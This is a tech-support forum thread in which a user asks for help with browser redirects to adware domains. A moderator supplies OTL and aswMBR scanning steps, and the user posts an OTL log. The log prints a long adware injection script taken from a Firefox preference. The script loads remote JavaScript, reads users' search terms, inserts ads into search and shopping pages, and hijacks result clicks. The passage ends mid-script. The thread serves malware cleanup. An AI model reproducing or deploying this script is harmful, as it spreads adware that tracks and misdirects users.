Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Getting Hit with rbv.jobfindgold.info [Solved]


  • This topic is locked This topic is locked

#1
monkeyboyblues

monkeyboyblues

    Member

  • Member
  • PipPipPip
  • 146 posts
Hello,

Mozilla browser keeps getting hit with the the following
malware:
rbv.jobfindgold.info
jds.drivejava.net

and possibly others.

I am constantly usinig Malwarebytes and Microsoft Security
Essentials to clean, but it keeps coming back everytime I
go online.

Also, would you recommend Avast?

Thanks for your help

Edited by monkeyboyblues, 14 January 2014 - 02:05 PM.

  • 0

Advertisements


#2
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Hi lets have a quick look see and try to resolve this for you

Download OTL to your Desktop
Secondary link
  • Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.

    Posted Image
  • Select All Users
  • Select LOP and Purity
  • Under the Custom Scan box paste this in

    netsvcs
    BASESERVICES
    %SYSTEMDRIVE%\*.exe
    c:\program files (x86)\Google\Desktop
    c:\program files\Google\Desktop
    dir "%systemdrive%\*" /S /A:L /C
    /md5start
    rpcss.dll
    /md5stop
    CREATERESTOREPOINT

  • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
  • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
  • Attach both logs

THEN

Download aswMBR.exe ( 4.5mb ) to your desktop.
Double click the aswMBR.exe to run it Click the "Scan" button to start scan

Posted Image


On completion of the scan click save log, save it to your desktop and post in your next reply
  • 0

#3
monkeyboyblues

monkeyboyblues

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 146 posts
OTL logfile created on: 1/14/2014 6:36:20 PM - Run 4
OTL by OldTimer - Version 3.2.53.0 Folder = C:\Documents and Settings\Administrator\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1014.11 Mb Total Physical Memory | 597.44 Mb Available Physical Memory | 58.91% Memory free
2.89 Gb Paging File | 2.60 Gb Available in Paging File | 89.99% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.53 Gb Total Space | 50.77 Gb Free Space | 68.13% Space Free | Partition Type: NTFS
Unable to calculate disk information.

Computer Name: LATITUDED620 | User Name: Administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/10/09 09:58:16 | 003,275,136 | ---- | M] (Skype Technologies S.A.) -- C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe
PRC - [2013/03/06 18:44:41 | 000,069,792 | ---- | M] (Absolute Software Corp.) -- C:\WINDOWS\system32\rpcnet.exe
PRC - [2012/06/30 11:46:07 | 000,596,992 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Administrator\Desktop\OTL.exe
PRC - [2012/03/26 16:08:12 | 000,931,200 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2012/03/26 16:03:40 | 000,011,552 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2008/04/14 07:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2007/01/30 11:02:00 | 000,303,104 | ---- | M] (FUJIFILM Corporation) -- C:\Program Files\FinePixViewer\QuickDCF2.exe


========== Modules (No Company Name) ==========

MOD - [2010/10/29 09:14:44 | 000,143,360 | ---- | M] () -- C:\WINDOWS\system32\preflib.dll
MOD - [2010/10/29 09:14:12 | 000,761,856 | ---- | M] () -- C:\WINDOWS\system32\bcm1xsup.dll
MOD - [2008/04/14 07:00:00 | 000,059,904 | ---- | M] () -- C:\WINDOWS\system32\devenum.dll
MOD - [2008/04/14 07:00:00 | 000,014,336 | ---- | M] () -- C:\WINDOWS\system32\msdmo.dll
MOD - [2007/02/16 19:01:00 | 000,081,920 | ---- | M] () -- C:\Program Files\FinePixViewer\wia_register_event.dll


========== Win32 Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- %SystemRoot%\System32\hidserv.dll -- (HidServ)
SRV - [2013/12/11 15:23:08 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013/12/10 22:41:58 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013/10/09 09:58:16 | 003,275,136 | ---- | M] (Skype Technologies S.A.) [Auto | Running] -- C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe -- (Skype C2C Service)
SRV - [2013/03/06 18:44:41 | 000,069,792 | ---- | M] (Absolute Software Corp.) [Auto | Running] -- C:\WINDOWS\system32\rpcnet.exe -- (rpcnet) Remote Procedure Call (RPC)
SRV - [2013/02/28 18:45:16 | 000,161,384 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012/03/26 16:03:40 | 000,011,552 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2004/09/29 11:14:36 | 000,069,632 | ---- | M] (HP) [Auto | Stopped] -- C:\WINDOWS\system32\HPZipm12.exe -- (Pml Driver HPZ12)


========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- -- (WDICA)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRELI)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDCOMP)
DRV - File not found [Kernel | System | Stopped] -- -- (PCIDump)
DRV - File not found [Kernel | System | Stopped] -- -- (lbrtfdc)
DRV - File not found [Kernel | System | Stopped] -- -- (i2omgmt)
DRV - File not found [Kernel | System | Stopped] -- -- (Changer)
DRV - [2010/10/29 09:14:44 | 002,649,216 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\BCMWL5.SYS -- (BCM43XX)
DRV - [2008/04/13 20:42:44 | 000,169,984 | ---- | M] (Cisco Systems) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\pcx500.sys -- (PCX500)
DRV - [2007/12/23 16:18:48 | 000,068,696 | ---- | M] (O2Micro) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\oz776.sys -- (guardian2)
DRV - [2007/05/10 09:24:34 | 001,222,840 | ---- | M] (SigmaTel, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\sthda.sys -- (STHDA)
DRV - [2006/08/04 15:39:10 | 000,008,192 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\XAudio.sys -- (XAudio)
DRV - [2005/10/26 09:01:02 | 000,142,720 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\b57xp32.sys -- (b57w2k)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant =
IE - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...ferrer:source?}
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-re...q={searchTerms}


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0


IE - HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar =
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 74 B9 FC 8B 2B B8 CD 01 [binary data]
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant =
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...Box&Form=IE8SRC
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-re...q={searchTerms}
IE - HKU\S-1-5-21-515967899-1604221776-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.defaultenginename: "Ixquick HTTPS"
FF - prefs.js..browser.search.order.1: "Search Results"
FF - prefs.js..browser.search.selectedEngine: "Ixquick HTTPS"
FF - prefs.js..browser.search.useDBForOrder: ""
FF - prefs.js..browser.startup.homepage: "https://ixquick.com/"
FF - prefs.js..extensions.VWM.scode: "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement('script'script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=74055d&userId=11676047779643670750&CTID=p945';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=309973&ext=saveshare\":\"//static.getjs.net/sd/1018/1007.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top && !document.getElementById('sjsjszmzmaw28aj6')){var script=document.createElement('script');script.type='text/javascript';script.setAttribute('id','sjsjszmzmaw28aj6');script.src='//static.getjs.net/sd/1018/1011.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//static.safesaver.net/apps/tv-classic/safesaver/tv-classic-safesaver.js\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/fo_bsso.min.js\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this,h=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.version=\"0.4\";b.jsonpHost=\"bestdepotstorey.asia\";b.now=(new Date).getTime();b.prefix=\"jhgasdf\";b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\"; b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\", function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0;if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\"); if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"], urls:[\"http://www.bing.com/search?*\"],src_for_keyword:\"#sb_form_q\",validate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"], validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\", \"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop= \"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a, null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"], src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache= [];a.add=window.addEventListener?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,b,e);g&&a.cache.push([c,b,e,f])}:window.attachEvent?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+b]=b;f[c+b]=function(){f[\"e\"+c+b](window.event)};f.attachEvent(\"on\"+c,f[c+b]);g&&a.cache.push([c,b,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"== typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.utils=new function(){var a=this;a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b,d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0); this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var k=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++; k(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]? b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\"; window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a= a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"== d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"== f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref= function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);e?b.checkClickInterval(e)&&b.addEventClick(g,a):b.addEventClick(g,a)}}};b.escape_chars_for_json=function(a){for(var b in a)a[b]= a[b].replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template); d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<h.length;b++)if(-1<a.layouts.id.indexOf(h[b]))return h[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a, c[0])),b.not_unique_items.push(c.shift())};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=l(f.inserts[g].selector); \"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;p=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(a.current_layout=b.get_layout_type(a),\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.inject_search=function(){b.not_unique_items= [];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search(); for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value; if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]); else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var 